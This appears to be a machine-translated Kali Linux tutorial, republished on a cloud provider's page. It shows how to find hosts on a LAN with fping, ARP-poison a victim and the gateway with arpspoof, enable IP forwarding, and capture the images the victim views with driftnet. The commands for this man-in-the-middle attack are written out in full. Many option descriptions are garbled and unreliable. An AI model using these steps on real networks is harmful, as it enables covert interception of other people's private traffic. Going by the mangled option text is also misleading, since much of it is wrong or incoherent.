Kali get target drone's picture and look at the URL

Source: Internet
Author: User

need to use fping tool with -asg parameter

Survey Options :

-4,IPv4 can only ping IPv4 address

-6--ipv6 only in ping IPv6 address

-b-- size = number of bytes of ping data is sent in bytes ( default :

-b--backoff=n Sets the exponent backoff factor to N ( the default value : 1. 5)

--count=n count mode : sends N ping signals to each target

- f file = file read the file list of the destination file (- indicates stdin)

-g-- generate a list of build targets ( only if no - f is specified )

( give start and end IP, or CIDR address in the target list )

( for example,fping-g 192.168.1.0 192.168.1.255 or fping-g 192.168.1.0/24)

-H,ttl=n Set the IP ttl value ( time to jump in real time )

--iface=iface binding to a specific interface

-l-- Cycle mode : always send ping signal

-m, all using IP with host name ( e.g. IPv4 and IPv6), using -A

-dontfrag Set the non-segmented mark

-o-tos=n Set the type of service (TOS) flag in the ICMP packet

-p,- cycle =msec interval to a target ( in ms)

( in loop and Count mode, default value : milliseconds )

-R, retry retry of =n ( default : 3)

-r-- randomly randomly grouped data ( used to thwart link data compression )

-s-src=ip Collection Source Address

-T,- timeout =msec separate target initial timeout ( default is milliseconds,

In addition to-l/-c/-c, it is- p period to milliseconds )

Output Options :

-A, the living target is alive.

-a-addr displaying targets by address

-C,vcount=n and - C, report results in verbose format

--timestamp print timestamp before each output line

-e--the time that is running in the returned package

-i- interval =msec interval send ping package ( default : Ten milliseconds )

-N, name shows target as name (-D is equivalent )

-n-netdata outputs are compatible with Netdata (-l-q is required )

-o- Downtime shows cumulative outage time ( lost packet interval )

-q- quiet Quiet ( do not show each target / flat result )

The -q-s=secs is the same as- Q but is displayed every n seconds

-S, statistics print final data

-u-Unreachable Target is unreachable

-V, version shown in version

View the IP that you scanned

turn on ARP spoofing with arpspoof-i eth0-t 192.168.1.5 192.168.1.1

Options

-I specify the interface to use.

- host of C | |

specify which hardware address to use when restoring arp Mappings

forming ; when cleaning, you can send packets with your own package

Address and host address. Packets Sent

a fake hw address can break with certain connections

convert /ap/ Bridge configuration, but it is more reliable

instead of using your own address, this is the default way to Arps

cleaned afterwards.

-T Target

specify a specific host to the ARP Poison ( if not specified

LAN host ) . Repeatedly specify multiple hosts.

-R Poison two hosts ( host and Target ) to capture both traffic

the direction. ( only valid in union with - t )

Host Specifies the host to intercept packets ( usually a

Local Gateway ) .

target drone broken network (ARP attack) after successful feedback

Turn off the process

turn on local IP forwarding

[Email protected]:~# echo 1 >/proc/sys/net/ipv4/ip_forward

in Progress (ARP spoofing) arpspoof-i eth0-t 192.168.1.5 192.168.1.1

Target can surf the internet

Use [Email protected]:~# driftnet-i eth0 tool to view the picture information target drone viewed

Options :

-H displays this help message.

-V detailed operation.

b beep when a new image is captured .

-I interface Select the interface to listen to ( default : all

interface ) .

-F file instead of listener interface, read capture

packets from the Pcap dump file ; the file can be a named pipe

used with Kismet , or similar use.

-P does not set the listener interface to chaotic mode.

Auxiliary mode : do not display the image on the screen, but save

Put them in a temporary directory and advertise their names on them.

Standard output.

Maximum number of images saved in the temp directory

In part-time mode.

the-D directory uses the specified temp directory.

the-x prefix is used when saving an image.

-S attempts to extract audio data from the network,

in addition to images. Currently, this supports MPEG data

Only.

-S extracts the audio stream instead of the image.

-M command to play MPEG audio data with the given command

s option ; this should be handled . MPEG Frame

the standard input provided. Default value : "mpg123--".

Main parameters:

-B beeps when capturing a new picture

-I interface Select Listener interface

-f file reads a picture from a specified pcap packet

-P do not allow the listening interface to use promiscuous mode

-A background mode: Saves the captured picture to the directory (not displayed on the screen)

-M number specifies how many pictures to save

-D directory Specifies the path to save the picture

-X prefix specifies the name of the prefix to save the picture

Examples of Use:

1. Real-time monitoring: Driftnet-i wlan0

2. Read a picture from a specified PCAP packet: driftnet-f/home/linger/backup/ap.pcapng-a-d/root/drifnet/

Kali get target drone's picture and look at the URL

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.